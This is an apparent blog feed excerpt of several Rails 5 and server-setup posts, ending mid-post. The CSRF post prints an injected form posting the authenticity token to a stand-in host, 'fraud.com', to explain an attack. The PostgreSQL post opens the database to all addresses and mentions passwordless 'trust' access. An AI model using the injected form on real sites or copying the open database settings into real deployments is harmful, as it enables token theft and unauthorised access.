<content type="html"><![CDATA[<p>Often while developing a Rails application, you may reach for one of these <a href="http://guides.rubyonrails.org/caching_with_rails.html">caching techniques</a> to boost performance. Along with these, Rails 5 now provides a way of caching a collection of records, thanks to the introduction of the following method:</p><pre><code class="language-plaintext">ActiveRecord::Relation#cache_key</code></pre><h3>What is collection caching?</h3><p>Consider the following example where we are fetching a collection of all users belonging to the city of Miami.</p><pre><code class="language-ruby">@users = User.where(city: 'Miami')</code></pre><p>Here <code>@users</code> is a collection of records and is an object of class <code>ActiveRecord::Relation</code>.</p><p>Whether the result of the above query remains the same depends on the following conditions.</p><ul><li>The query statement doesn't change. If we change the city name from &quot;Miami&quot; to &quot;Boston&quot;, the result might change.</li><li>No record is deleted. The count of records in the collection should stay the same.</li><li>No record is added. The count of records in the collection should stay the same.</li></ul><p>The Rails community <a href="https://github.com/rails/rails/pull/20884">implemented caching for a collection of records</a>. The method <code>cache_key</code> was added to <code>ActiveRecord::Relation</code>, which takes into account many factors including the query statement, the updated_at column value and the count of the records in the collection.</p><h3>Understanding ActiveRecord::Relation#cache_key</h3><p>We have the object <code>@users</code> of class <code>ActiveRecord::Relation</code>. Now let's execute the <code>cache_key</code> method on it.</p><pre><code class="language-ruby"> @users.cache_key =&gt; &quot;users/query-67ed32b36805c4b1ec1948b4eef8d58f-3-20160116111659084027&quot;</code></pre><p>Let's try to understand each piece of the output.</p><p><strong><code>users</code></strong> represents what kind of records we are holding. In this example we have a collection of records of class <code>User</code>; hence <code>users</code> illustrates that we are holding <code>users</code> records.</p><p><strong><code>query-</code></strong> is a hardcoded value and will be the same in all cases.</p><p><strong><code>67ed32b36805c4b1ec1948b4eef8d58f</code></strong> is a digest of the query statement that will be executed. In our example it is <code>MD5( &quot;SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;city&quot; = 'Miami'&quot;)</code>.</p><p><strong><code>3</code></strong> is the size of the collection.</p><p><strong><code>20160116111659084027</code></strong> is the timestamp of the most recently updated record in the collection. 
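Putting those pieces together in plain Ruby gives a feel for the key's shape. The helper below is a hypothetical sketch mirroring the four parts described above, not Rails' actual implementation:

```ruby
require "digest/md5"
require "time"

# Hypothetical sketch of the key's four parts: model name, MD5 of the SQL,
# collection size, and the max timestamp formatted down to microseconds.
def sketch_collection_cache_key(model_name, sql, size, max_updated_at)
  timestamp = max_updated_at.utc.strftime("%Y%m%d%H%M%S%6N")
  "#{model_name}/query-#{Digest::MD5.hexdigest(sql)}-#{size}-#{timestamp}"
end

sql = %(SELECT "users".* FROM "users" WHERE "users"."city" = 'Miami')
key = sketch_collection_cache_key("users", sql, 3,
                                  Time.parse("2016-01-16 11:16:59.084027 UTC"))
# key ends with "-3-20160116111659084027"
```

Any change to the SQL text, the collection size, or the latest timestamp produces a different string, which is exactly what invalidates the cached fragment.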
By default, the timestamp column considered is <code>updated_at</code>, and hence the value will be the most recent <code>updated_at</code> value in the collection.</p><h2>Using ActiveRecord::Relation#cache_key</h2><p>Let's see how to use <code>cache_key</code> to actually cache data.</p><p>In our Rails application, if we want to cache records of users belonging to &quot;Miami&quot;, we can take the following approach.</p><pre><code class="language-ruby"># app/controllers/users_controller.rbclass UsersController &lt; ApplicationController  def index    @users = User.where(city: 'Miami')  endend# users/index.html.erb&lt;% cache(@users) do %&gt;  &lt;% @users.each do |user| %&gt;    &lt;p&gt; &lt;%= user.city %&gt; &lt;/p&gt;  &lt;% end %&gt;&lt;% end %&gt;# 1st HitProcessing by UsersController#index as HTML  Rendering users/index.html.erb within layouts/application   (0.2ms)  SELECT COUNT(*) AS &quot;size&quot;, MAX(&quot;users&quot;.&quot;updated_at&quot;) AS timestamp FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;city&quot; = ?  [[&quot;city&quot;, &quot;Miami&quot;]]Read fragment views/users/query-37a3d8c65b3f0f9ece7f66edcdcb10ab-4-20160704131424063322/30033e62b28c83f26351dc4ccd6c8451 (0.0ms)  User Load (0.1ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;city&quot; = ?  [[&quot;city&quot;, &quot;Miami&quot;]]Write fragment views/users/query-37a3d8c65b3f0f9ece7f66edcdcb10ab-4-20160704131424063322/30033e62b28c83f26351dc4ccd6c8451 (0.0ms)Rendered users/index.html.erb within layouts/application (3.7ms)# 2nd HitProcessing by UsersController#index as HTML  Rendering users/index.html.erb within layouts/application   (0.2ms)  SELECT COUNT(*) AS &quot;size&quot;, MAX(&quot;users&quot;.&quot;updated_at&quot;) AS timestamp FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;city&quot; = ?  [[&quot;city&quot;, &quot;Miami&quot;]]Read fragment views/users/query-37a3d8c65b3f0f9ece7f66edcdcb10ab-4-20160704131424063322/30033e62b28c83f26351dc4ccd6c8451 (0.0ms)  Rendered users/index.html.erb within layouts/application (3.0ms)</code></pre><p>From the above, we can see that for the first hit, a <code>count</code> query is fired to get the latest <code>updated_at</code> and <code>size</code> from the users collection.</p><p>Rails then writes a new cache entry with a <code>cache_key</code> generated from the above <code>count</code> query.</p><p>On the second hit, it again fires the <code>count</code> query and checks whether a cache entry for this cache_key exists.</p><p>If the cache_key is found, it loads the data without firing the SQL query.</p><h4>What if your table doesn't have updated_at column?</h4><p>Previously we mentioned that the <code>cache_key</code> method uses the <code>updated_at</code> column. <code>cache_key</code> also provides the option of passing a custom column as a parameter; the highest value of that column among the records in the collection will then be considered.</p><p>For example, if your business logic considers a column named <code>last_bought_at</code> in the <code>products</code> table as a factor to decide caching, you can use the following code.</p><pre><code class="language-ruby"> products = Product.where(category: 'cars') products.cache_key(:last_bought_at) =&gt; &quot;products/query-211ae6b96ec456b8d7a24ad5fa2f8ad4-4-20160118080134697603&quot;</code></pre><h3>Edge cases to watch out for</h3><p>Before you start using <code>cache_key</code>, there are some edge cases to watch out for.</p><p>Consider you have an application where there are 5 entries in the <code>users</code> table with <code>city</code> Miami.</p><p><em><strong>Using limit puts an incorrect size in the cache key if the collection is not loaded.</strong></em></p><p>If you want to fetch three users belonging to the city &quot;Miami&quot;, you would execute the following query.</p><pre><code class="language-ruby"> 
users = User.where(city: 'Miami').limit(3) users.cache_key =&gt; &quot;users/query-67ed32b36805c4b1ec1948b4eef8d58f-3-20160116144936949365&quot;</code></pre><p>Here users contains only three records and hence the <code>cache_key</code> has 3 for sizeof collection.</p><p>Now let's try to execute same query without fetching the records first.</p><pre><code class="language-ruby"> User.where(name: 'Sam').limit(3).cache_key =&gt; &quot;users/query-8dc512b1408302d7a51cf1177e478463-5-20160116144936949365&quot;</code></pre><p>You can see that the count in the cache is 5 this time even though we have set alimit to 3. This is because the implementation ofActiveRecord::Base#collection_cache_key<a href="https://github.com/rails/rails/blob/39f383bad01e52c217c9007b5e9d3b239fe6a808/activerecord/lib/active_record/collection_cache_key.rb#L16">executes query without limit</a>to fetch the size of the collection.</p><h4>Cache key doesn't change when an existing record from a collection is replaced</h4><p>I want 3 users in the descending order of ids.</p><pre><code class="language-ruby"> users1 = User.where(city: 'Miami').order('id desc').limit(3) users1.cache_key =&gt; &quot;users/query-57ee9977bb0b04c84711702600aaa24b-3-20160116144936949365&quot;</code></pre><p>Above statement will give us users with ids <code>[5, 4, 3]</code>.</p><p>Now let's remove the user with id = 3.</p><pre><code class="language-ruby"> User.find(3).destroy users2 = User.where(first_name: 'Sam').order('id desc').limit(3) users2.cache_key =&gt; &quot;users/query-57ee9977bb0b04c84711702600aaa24b-3-20160116144936949365&quot;</code></pre><p>Note that <code>cache_key</code> both <code>users1</code> and <code>users2</code> is exactly same. 
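</p><p>Before looking at why, it helps to see what actually goes into the key. Below is a minimal pure-Ruby sketch of the key's shape (query digest, collection size, latest timestamp); the <code>collection_cache_key</code> helper here is illustrative and is not ActiveRecord's real implementation:</p>

```ruby
require 'digest/md5'
require 'time'

# Hypothetical helper mirroring the shape of a collection cache key:
# "table/query-DIGEST-SIZE-TIMESTAMP" (not the real ActiveRecord code).
def collection_cache_key(table, sql, size, max_updated_at)
  digest    = Digest::MD5.hexdigest(sql)
  timestamp = max_updated_at.strftime("%Y%m%d%H%M%S%6N")
  "#{table}/query-#{digest}-#{size}-#{timestamp}"
end

latest = Time.parse("2016-01-16 14:49:36.949365 UTC")
key = collection_cache_key("users", "SELECT ... WHERE city = 'Miami'", 3, latest)
# The key changes only when the SQL text, the collection size, or the
# latest timestamp changes; swapping one record for another while all
# three stay the same leaves the key untouched.
```

<p>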
This is because none of the parameters that affect the cache key has changed, i.e., neither the number of records, nor the query statement, nor the timestamp of the latest record.</p><p>There is <a href="https://github.com/rails/rails/pull/21503">an ongoing discussion</a> about adding the ids of the collection's records as part of the cache key. This might help solve the problems discussed above.</p><h4>Using a group query gives an incorrect size in the cache key</h4><p>Just like the <code>limit</code> case discussed above, <code>cache_key</code> behaves differently depending on whether or not the collection is loaded in memory.</p><p>Let's say that we have two users with first_name &quot;Sam&quot;.</p><p>First let's see a case where the collection is not loaded in memory.</p><pre><code class="language-ruby">User.select(:first_name).group(:first_name).cache_key
=&gt; &quot;users/query-92270644d1ec90f5962523ed8dd7a795-1-20160118080134697603&quot;</code></pre><p>In the above case, the size in the <code>cache_key</code> is 1. For the data mentioned above, the size you get will be either 1 or 5. That is, it is the size of an arbitrary group.</p><p>Now let's see what happens when the collection is loaded first.</p><pre><code class="language-ruby">users = User.select(:first_name).group(:first_name)
users.cache_key
=&gt; &quot;users/query-92270644d1ec90f5962523ed8dd7a795-2-20160118080134697603&quot;</code></pre><p>In the above case, the size in the <code>cache_key</code> is 2. You can see that the count in the cache key here is different from the unloaded case, even though the query output in both cases is exactly the same.</p><p>When the collection is loaded, the size you get is the total number of groups. So irrespective of what the records in each group are, we may end up with the same cache key value.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Caching in development environment in Rails 5]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/caching-in-development-environment-in-rails5"/>
      <updated>2016-01-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/caching-in-development-environment-in-rails5</id>
      <content type="html"><![CDATA[<p>In Rails 4, if I'm doing work related to caching then first I need to turn caching &quot;on&quot; by opening the file <code>config/environments/development.rb</code> and changing the following line.</p><pre><code class="language-ruby">config.action_controller.perform_caching = false</code></pre><p>After changing the value from <code>false</code> to <code>true</code>, I need to restart the server.</p><p>This means that if I am testing caching behavior locally then every time I turn caching &quot;on&quot; or &quot;off&quot; I need to restart the server.</p><h2>New command to create development cache in Rails 5</h2><p>Rails 5 has introduced a new command to create the development cache and help us test how caching behaves in development mode. Here is the <a href="https://github.com/rails/rails/issues/18875">issue</a> and here is the <a href="https://github.com/rails/rails/pull/20961">pull request</a>.</p><pre><code class="language-plaintext">$ rails dev:cache
Development mode is now being cached.</code></pre><p>Executing the above command creates the file <code>caching-dev.txt</code> in the <code>tmp</code> directory.</p><h2>How does it work?</h2><p>In Rails 5, when a brand new Rails app is created, the <code>config/environments/development.rb</code> file will have the following snippet of code.</p><pre><code class="language-ruby">if Rails.root.join('tmp/caching-dev.txt').exist?
  config.action_controller.perform_caching = true
  config.static_cache_control = &quot;public, max-age=172800&quot;
  config.cache_store = :mem_cache_store
else
  config.action_controller.perform_caching = false
  config.cache_store = :null_store
end</code></pre><p>In the above code we check whether the file <code>tmp/caching-dev.txt</code> is present, and use <code>:mem_cache_store</code> to enable caching only if the file is found.</p><p>Also, here is a snippet from the <a href="https://github.com/rails/rails/blob/master/railties/lib/rails/commands/dev/dev_command.rb">dev cache source code</a>.</p><pre><code class="language-ruby">def dev_cache
  if File.exist? 'tmp/caching-dev.txt'
    File.delete 'tmp/caching-dev.txt'
    puts 'Development mode is no longer being cached.'
  else
    FileUtils.touch 'tmp/caching-dev.txt'
    puts 'Development mode is now being cached.'
  end
  FileUtils.touch 'tmp/restart.txt'
end</code></pre><h2>What is the advantage?</h2><p>The advantage is that we do not need to restart the server manually when we want to turn caching &quot;on&quot; or &quot;off&quot;. It is taken care of internally by the <code>dev_cache</code> method that runs when <code>rails dev:cache</code> is executed. You can see in the source code that <code>tmp/restart.txt</code> is being <strong>touched</strong>.</p><p>Please note that <strong>this feature is not supported</strong> by unicorn, thin and webrick. My guess is that DHH wants this feature because his team uses pow, and pow restarts when <code>tmp/restart.txt</code> is touched. He also created an issue for <a href="https://github.com/rails/rails/issues/18874">spring to watch tmp/restart.txt</a> a long time back.</p><h2>Disabling development cache</h2><p>Execute the same command that was used to enable caching. If caching was previously enabled then it will be turned &quot;off&quot; now.</p><pre><code class="language-plaintext">$ rails dev:cache
Development mode is no longer being cached.</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Configure PostgreSQL to allow remote connection]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/configure-postgresql-to-allow-remote-connection"/>
      <updated>2016-01-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/configure-postgresql-to-allow-remote-connection</id>
      <content type="html"><![CDATA[<p>By default PostgreSQL is configured to be bound to &quot;localhost&quot;.</p><pre><code class="language-plaintext">$ netstat -nlt
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3737          0.0.0.0:*               LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN</code></pre><p>As we can see above, port <code>5432</code> is bound to <code>127.0.0.1</code>. It means any attempt to connect to the PostgreSQL server from outside the machine will be refused. We can try hitting port <code>5432</code> using telnet.</p><pre><code class="language-plaintext">$ telnet 107.170.11.79 5432
Trying 107.170.11.79...
telnet: connect to address 107.170.11.79: Connection refused
telnet: Unable to connect to remote host</code></pre><h2>Configuring postgresql.conf</h2><p>In order to fix this issue we need to find <code>postgresql.conf</code>. On different systems it is located in different places. 
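</p><p>As an aside, if you can already connect locally, PostgreSQL can report the location itself; <code>SHOW config_file</code> is a standard PostgreSQL command:</p>

```sql
-- Run inside a local psql session; prints the absolute path of postgresql.conf.
SHOW config_file;
```

<p>Otherwise, 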
I usually search for it.</p><pre><code class="language-plaintext">$ find / -name &quot;postgresql.conf&quot;
/var/lib/pgsql/9.4/data/postgresql.conf</code></pre><p>Open the <code>postgresql.conf</code> file and replace the line</p><pre><code class="language-plaintext">listen_addresses = 'localhost'</code></pre><p>with</p><pre><code class="language-plaintext">listen_addresses = '*'</code></pre><p>Now restart the PostgreSQL server.</p><pre><code class="language-plaintext">$ netstat -nlt
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:2812          0.0.0.0:*               LISTEN
tcp6       0      0 ::1:11211               :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 :::5432                 :::*                    LISTEN
tcp6       0      0 ::1:25                  :::*                    LISTEN</code></pre><p>Here we can see that the &quot;Local Address&quot; for port <code>5432</code> has changed to <code>0.0.0.0</code>.</p><h2>Configuring pg_hba.conf</h2><p>Let's try to connect to the remote PostgreSQL server using <code>psql</code>.</p><pre><code class="language-plaintext">$ psql -h 107.170.158.89 -U postgres
psql: could not connect to server: Connection refused
Is the server running on host &quot;107.170.158.89&quot; and accepting
TCP/IP connections on port 5432?</code></pre><p>In order to fix it, open <code>pg_hba.conf</code> and add the following entries at the very end.</p><pre><code class="language-plaintext">host    all             all              0.0.0.0/0                       md5
host    all             all              ::/0                            md5</code></pre><p>The second entry is for the IPv6 network.</p><p>Do not get confused by the &quot;md5&quot; option mentioned above. All it means is that a password needs to be provided. If you want to allow clients to connect without providing any password then change &quot;md5&quot; to &quot;trust&quot; and that will allow connections unconditionally.</p><p>Restart the PostgreSQL server.</p><pre><code class="language-plaintext">$ psql -h 107.170.158.89 -U postgres
Password for user postgres:
psql (9.4.1, server 9.4.5)
Type &quot;help&quot; for help.

postgres=# \l</code></pre><p>You should be able to see the list of databases.</p><p>Now we are able to connect to the PostgreSQL server remotely.</p><p>Please note that in the real world you should add an extra layer of security by using &quot;iptables&quot;.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 wraps all rake commands using rails]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-supports-rake-commands-using-rails"/>
      <updated>2016-01-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-supports-rake-commands-using-rails</id>
      <content type="html"><![CDATA[<p>In Rails 4 some commands start with <code>rails</code> and some commands start with <code>rake</code>. This could be quite confusing for people new to Rails. Let's see an example.</p><p>Our task is to write a database migration and then to run that migration.</p><pre><code class="language-ruby">rails g migration create_users</code></pre><p>The above command creates a migration. Now we need to run that migration.</p><pre><code class="language-ruby">rake db:migrate</code></pre><p>As you can see, the first command starts with <code>rails</code> and the second command starts with <code>rake</code>.</p><p>In order to consolidate them we can either use <code>rails</code> for everything or we can use <code>rake</code> for everything.</p><h2>Choosing the rails command over the rake command</h2><p>Some favor using <code>rake</code> over <code>rails</code>. But an important feature missing in Rake is the ability to pass arguments.</p><pre><code class="language-ruby">rails console development</code></pre><p>In order to execute the above command using <code>rake</code> we would have to pass <code>console</code> and <code>development</code> as arguments. We could pass these values using environment variables, but that would mean adding additional code in the Rake task to fetch the right values; only then would we be able to invoke the equivalent of <code>rails console development</code>.</p><h2>Rails 5 enables executing rake commands with rails</h2><p>The Rails core team <a href="https://github.com/rails/rails/pull/22288">decided</a> to bring consistency by enabling the <code>rails</code> command to support everything that <code>rake</code> does.</p><p>For example, in Rails 5 commands like <code>db:migrate</code>, <code>setup</code>, <code>test</code> etc., which are part of the <code>rake</code> command in Rails 4, are now supported by the <code>rails</code> command. However, you can still choose to use <code>rake</code> to run those commands, similar to how they were run in Rails 4. 
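</p><p>The dispatch can be pictured as a tiny proxy: if the command is one that <code>rails</code> knows natively it runs it, otherwise the name is handed over to Rake. The sketch below is only illustrative; <code>NATIVE_COMMANDS</code> and <code>run_command</code> are hypothetical names, not actual Rails internals:</p>

```ruby
# Illustrative sketch of the proxy idea; NATIVE_COMMANDS and run_command
# are hypothetical names and not part of Rails itself.
NATIVE_COMMANDS = %w[new server console generate destroy].freeze

def run_command(name)
  if NATIVE_COMMANDS.include?(name)
    "rails handles #{name} natively"
  else
    "rails delegates #{name} to rake"
  end
end

run_command("console")    # => "rails handles console natively"
run_command("db:migrate") # => "rails delegates db:migrate to rake"
```

<p>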
This is because the Rails community has <a href="https://github.com/rails/rails/blob/f718e52bcce02bc137263ead3a9d9f5df1c42c37/railties/lib/rails/commands/rake_proxy.rb">introduced a Rake Proxy</a> instead of completely moving the command options from <code>rake</code> to <code>rails</code>.</p><p>What happens internally is that when the <code>rails db:migrate</code> command is executed, Rails checks whether <code>db:migrate</code> is something that <code>rails</code> natively supports. In this case <code>db:migrate</code> is not natively supported by <code>rails</code>, so Rails delegates the execution to Rake via the Rake Proxy.</p><p>If you want to see all the commands that are supported by <code>rails</code> in Rails 5, you can get a long list of options by executing <code>rails --help</code>.</p><h3>Use app namespace for framework tasks in Rails 5</h3><p>As the <code>rails</code> command is now preferred over the <code>rake</code> command, a few rails-namespaced framework tasks started looking a little odd.</p><pre><code class="language-bash">$ rails rails:update
$ rails rails:template
$ rails rails:templates:copy
$ rails rails:update:configs
$ rails rails:update:bin</code></pre><p>So, the Rails team decided to change the namespace for these tasks from <code>rails</code> to <code>app</code>.</p><pre><code class="language-bash">$ rails app:update
$ rails app:template
$ rails app:templates:copy
$ rails app:update:configs
$ rails app:update:bin</code></pre><p>Using <code>rails rails:update</code> will now give a deprecation warning like: <code>DEPRECATION WARNING: Running update with the rails: namespace is deprecated in favor of app: namespace. Run bin/rails app:update instead</code>.</p><h2>More improvements in the pipeline</h2><p>In Rails 4, the routes are usually searched like this.</p><pre><code class="language-plaintext">$ rake routes | grep pattern</code></pre><p>There <a href="https://github.com/rails/rails/issues/18902">is an effort underway</a> to have a Rails command which might work as shown below.</p><pre><code class="language-plaintext">$ rails routes -g pattern</code></pre><p>There is also <a href="https://github.com/rails/rails/pull/20420">an effort to enable lookup by controller</a> like this.</p><pre><code class="language-plaintext">$ rails routes -c some_controller</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Each form gets its own CSRF token in Rails 5]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/per-form-csrf-token-in-rails-5"/>
      <updated>2016-01-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/per-form-csrf-token-in-rails-5</id>
      <content type="html"><![CDATA[<p>We have <a href="csrf-and-rails">written an extensive blog</a> on what <strong>CSRF</strong> is and what steps Rails 4 takes to prevent it. We encourage you to read that blog to fully understand the rest of this article.</p><h2>A nested form can get around the CSRF protection offered by Rails 4</h2><p>A typical form generated in Rails 4 might look like this.</p><pre><code class="language-plaintext">&lt;form method=&quot;post&quot; action=&quot;/money_transfer&quot;&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;authenticity_token&quot; value=&quot;token_value&quot;&gt;
&lt;/form&gt;</code></pre><p>Using code injection, a hacker can use JavaScript to add another form tag above the form tag generated by Rails. Now the markup looks like this.</p><pre><code class="language-plaintext">&lt;form method=&quot;post&quot; action=&quot;http://www.fraud.com/fraud&quot;&gt;
  &lt;form method=&quot;post&quot; action=&quot;/money_transfer&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;authenticity_token&quot; value=&quot;token_value&quot;&gt;
  &lt;/form&gt;
&lt;/form&gt;</code></pre><p>The HTML specification <a href="http://stackoverflow.com/questions/379610/can-you-nest-html-forms">does not allow nested forms</a>.</p><p>Since nested forms are not allowed, the browser will honor only the topmost form. In this case that happens to be the form created by the hacker. When this form is submitted, the &quot;authenticity_token&quot; is submitted along with it; Rails performs its check, concludes that everything looks good, and thus the hacker is able to attack the site.</p><h2>Rails 5 fixes the issue by generating a custom token for each form</h2><p>In Rails 5, <a href="https://github.com/rails/rails/pull/22275">a CSRF token can be added for each form</a>. Each CSRF token will be valid only for the method/action of the form it was included in.</p><p>You can add the following line to your controller to add an authenticity token specific to the method and action in each form tag of the controller.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController
  self.per_form_csrf_tokens = true
end</code></pre><p>Adding that code to each controller feels burdensome. In that case you can enable this behavior for all controllers in the application by adding the following line to the application configuration.</p><pre><code class="language-ruby"># config/application.rb
Rails.configuration.action_controller.per_form_csrf_tokens = true</code></pre><p>This will add an authenticity token specific to the method and action in each form tag of the application. After adding that token, the generated form might look as shown below.</p><pre><code class="language-plaintext">&lt;form method=&quot;post&quot; action=&quot;/money_transfer&quot;&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;authenticity_token&quot; value=&quot;money_transfer_post_action_token&quot;&gt;
&lt;/form&gt;</code></pre><p>The authenticity token included here is specific to the action <code>money_transfer</code> and the method <code>post</code>. An attacker can still grab the authenticity_token, but the attack will be limited to the <code>money_transfer</code> <code>post</code> action.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rendering views outside of controllers in Rails 5]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rendering-views-outside-of-controllers-in-rails-5"/>
      <updated>2016-01-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rendering-views-outside-of-controllers-in-rails-5</id>
      <content type="html"><![CDATA[<p>The Rails request-response cycle is easy to understand. A request hits the app, a route is matched to a controller action from <code>routes.rb</code>, and finally the controller action processes the request and renders HTML or JSON based on the type of the request.</p><p>But sometimes we want to render our HTML or JSON response outside of this request-response cycle.</p><p>For example, let's say a user is allowed to download a PDF version of a report on the web. This can be done using the request-response cycle. We also need to send a weekly report to managers, and the email should have the report as an attachment. Now we need to generate the same PDF, but since emails are sent using a background job, the request-response cycle is missing.</p><p>Rails 5 has this feature baked in.</p><p>Let's say we have an <code>OrdersController</code> and we want to render an individual order outside of the controller.</p><p>Fire up <code>rails console</code> and execute the following command.</p><pre><code class="language-ruby">OrdersController.render :show, assigns: { order: Order.last }</code></pre><p>This will render <code>app/views/orders/show.html.erb</code> with <code>@order</code> set to <code>Order.last</code>. Instance variables can be set using <code>assigns</code> in the same way we use them in controller actions. Those instance variables will be passed to the view that is going to be rendered.</p><p>Rendering partials is also possible.</p><pre><code class="language-ruby">OrdersController.render :_form, locals: { order: Order.last }</code></pre><p>This will render <code>app/views/orders/_form.html.erb</code> and will pass <code>order</code> as a local variable.</p><p>Say I want to render all orders, but in JSON format.</p><pre><code class="language-plaintext">OrdersController.render json: Order.all
# =&gt; &quot;[{&quot;id&quot;:1, &quot;name&quot;:&quot;The Well-Grounded Rubyist&quot;, &quot;author&quot;:&quot;David A. Black&quot;},
#     {&quot;id&quot;:2, &quot;name&quot;:&quot;Remote: Office not required&quot;, &quot;author&quot;:&quot;David &amp; Jason&quot;}]&quot;</code></pre><p>Even rendering simple text is possible.</p><pre><code class="language-ruby">&gt;&gt; BooksController.render plain: 'this is awesome!'
  Rendered text template (0.0ms)
# =&gt; &quot;this is awesome!&quot;</code></pre><p>Similar to <code>plain</code>, we can also use <code>render file</code> and <code>render template</code>.</p><h3>Request environment</h3><p>A typical web request carries its own environment with it. We usually handle this environment using <code>request.env</code> in controllers. Certain gems like <code>devise</code> depend on the <code>env</code> hash for information such as the warden token.</p><p>So when we are rendering outside of a controller, we need to make sure that the rendering happens with the correct environment.</p><p>Rails provides a default rack environment for this purpose. The default options used can be accessed through <code>renderer.defaults</code>.</p><pre><code class="language-ruby">&gt;&gt; OrdersController.renderer.defaults
=&gt; {:http_host=&gt;&quot;example.org&quot;, :https=&gt;false, :method=&gt;&quot;get&quot;, :script_name=&gt;&quot;&quot;, :input=&gt;&quot;&quot;}</code></pre><p>Internally, Rails will build a new Rack environment based on these options.</p><h2>Customizing the environment</h2><p>We can customize the environment using the method <code>renderer</code>. Let's say that we need the method to be &quot;post&quot; and &quot;https&quot; to be true for our background job processing.</p><pre><code class="language-ruby">renderer = ApplicationController.renderer.new(method: 'post', https: true)
# =&gt; #&lt;ActionController::Renderer:0x007fdf34453f10 @controller=ApplicationController,
#      @defaults={:http_host=&gt;&quot;example.org&quot;, :https=&gt;false, :method=&gt;&quot;get&quot;, :script_name=&gt;&quot;&quot;, :input=&gt;&quot;&quot;},
#      @env={&quot;HTTP_HOST&quot;=&gt;&quot;example.org&quot;, &quot;HTTPS&quot;=&gt;&quot;on&quot;, &quot;REQUEST_METHOD&quot;=&gt;&quot;POST&quot;, &quot;SCRIPT_NAME&quot;=&gt;&quot;&quot;, &quot;rack.input&quot;=&gt;&quot;&quot;}&gt;</code></pre><p>Now that we have our custom <code>renderer</code> we can use it to generate the view.</p><pre><code class="language-ruby">renderer.render template: 'show', locals: { order: Order.last }</code></pre><p>Overall this is a nice feature which enables reuse of existing code.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Not using https might be breaking file uploads]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/not-using-https-might-be-breaking-file-uploads"/>
      <updated>2016-01-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/not-using-https-might-be-breaking-file-uploads</id>
      <content type="html"><![CDATA[<p>Recently we came across the following error when a mobile app was trying to upload images using the backend API.</p><pre><code class="language-bash">==&gt; nginx-error.log &lt;==
2015/12/16 07:34:13 [error] 1440#0: *1021901
sendfile() failed (32: Broken pipe) while sending request to upstream,
client: xxx.xx.xxx.xx, server: app-name.local,
request: &quot;POST /api_endpoint HTTP/1.1&quot;,
upstream: &quot;http://unix:/data/apps/app-name/shared/tmp/sockets/unicorn.sock:/api_endpoint&quot;,
host: &quot;appname.com&quot;

==&gt; nginx-error.log &lt;==
xxx.xx.xxx.xx - - [16/Dec/2015:07:34:13 - 0500]
&quot;POST /api_endpoint HTTP/1.1&quot; 502 1051 &quot;-&quot;
&quot;Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 (366691552)&quot;</code></pre><p>The backend API was developed using Ruby on Rails and was powered by the NGINX HTTP server along with the unicorn application server.</p><p>Notice that the HTTP response received was <code>502</code>, which is documented in the RFC as shown below.</p><blockquote><p>10.5.3 502 Bad Gateway: The server, while acting as a gateway or proxy, received an invalid response from the upstream server it accessed in attempting to fulfill the request.</p></blockquote><h2>Debugging the problem</h2><p>At first look it seemed that the <code>client_max_body_size</code> parameter for NGINX was too small, which would cause the request to fail if the uploaded file size were greater than the allowed limit.</p><pre><code class="language-bash"># nginx.conf
http {
  ...
  client_max_body_size 250M;
  ...
